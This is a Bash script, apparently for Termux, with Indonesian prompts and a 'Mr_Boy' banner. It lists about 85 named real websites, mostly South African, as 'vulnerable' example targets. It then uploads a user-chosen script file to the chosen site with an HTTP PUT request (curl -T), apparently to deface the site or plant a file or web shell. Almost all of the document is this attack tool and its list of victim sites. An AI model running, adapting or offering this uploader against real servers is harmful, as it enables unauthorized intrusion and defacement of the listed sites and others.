clear
echo "\033[34;1m"
cowsay -f kiss.cow "Mr_Boy" | lolcat
figlet -f slant Mr_Boy
echo "\033[37;1m"
echo "Masukan Web target"
echo "Contoh Web Target vuln"
echo "  http://bestilling.udir.no/"
echo "  http://560560.ru/"
echo "  http://myownemailer.com/"
echo "  http://Zoocentral.co.za/"
echo "  http://50-50-50.ru/"
echo "  http://tirupurjobs.net/"
echo "  http://mestern.co.za/"
echo "  http://megro.co.za/"
echo "  http://bitpc.co.za/"
echo "  http://butterflowers.co.za/"
echo "  http://beeit.co.za/"
echo "  http://esfml.com/"
echo "  http://bee-it.co.za/"
echo "  http://mc3qs.com/"
echo "  http://marjoriebresler.com/"
echo "  http://naturaleyeimages.com/"
echo "  http://my-resume.biz/"
echo "  http://mpark.co.za/"
echo "  http://montdestin.com/"
echo "  http://africa-one.co.za/"
echo "  http://ads247.co.za/"
echo "  http://accelerate-kids.co.za/"
echo "  http://8x8.co.za/"
echo "  http://aaglcapetown2013.org.za/"
echo "  http://allpaint.co.za/"
echo "  http://andrewswebcorner.co.za/"
echo "  http://applebyguesthouse.com/"
echo "  http://atlanticphysio.co.za/"
echo "  http://page31.co.za/"
echo "  http://vaigaidigitals.com/"
echo "  http://systemshouse.co.za/"
echo "  http://www.studentsonline.co.za/"
echo "  http://lucaniphysio.co.za/"
echo "  http://www.onboardpublications.co.za/"
echo "  http://www.oilandclay.co.za/"
echo "  http://www.aquafitness.za.net/"
echo "  http://www.helderbergit.co.za/"
echo "  http://www.pipelinetape.co.za/"
echo "  http://www.drcrsaexpress.co.za/"
echo "  http://Matrimony.co.za/"
echo "  http://Bheh.co.za/"
echo "  http://mix007.co.za/"
echo "  http://spyroom.co.za/"
echo "  http://sportspod.co.za/"
echo "  http://southernafricablog.com/"
echo "  http://stand66.com/"
echo "  http://tapifare.com/"
echo "  http://tankertech.co.za/"
echo "  http://tcnig.co.za/"
echo "  http://tcmgroup.co.za/"
echo "  http://tressor.co.za/"
echo "  http://trafficam.co.za/"
echo "  http://tuthukani.co.za/"
echo "  http://nyarhi.co.za/"
echo "  http://digishop.co.za/"
echo "  http://elinemsa.co.za/"
echo "  http://disucctv.co.za/"
echo "  http://www.cai.co.za/"
echo "  http://tirupurjobs.net/"
echo "  http://inlislitev3.perpusnas.go.id/"
echo "  http://clcooling.co.za/"
echo "  http://sublimeconfectionery.co.za/"
echo "  http://gogreenplumbing.co.za/"
echo "  http://golfbuzz.co.za/"
echo "  http://grupo-cma.com/"
echo "  http://inkspot.co.za/"
echo "  http://kgarebana.co.za/"
echo "  http://ittrader.co.za/"
echo "  http://hellomobile.mobi/"
echo "  http://homebuzz.co.za/"
echo "  http://gordonhoward.co.za/"
echo "  http://democonstruction.co.za/"
echo "  http://chasingfantasia.co.za/"
echo "  http://litehouse.co.za/"
echo "  http://ldata.co.za/"
echo "  http://lunique.co.za/"
echo "  http://chillibitez.co.za/"
echo "  http://cmweb.co.za/"
echo "  http://essentialtours.com/"
echo "  http://entitledvip.com/"
echo "  http://frankadesign.com/"
echo "  http://forget-me-not.co.za/"
echo "  http://findpersonnel.co.za/"
echo "  http://everythingdating.co.za/"
read -p "[Mr_Boy]>" target
echo "Masukan Nama script kalian"
echo "yang ada di Luar Folder Ruang Penyimpanan"
read -p "[Mr_Boy]>" script
curl -T /storage/emulated/0/$script $target
echo "\033[33;1m"
echo "Selesai! cek ajh sendiri $target $script "
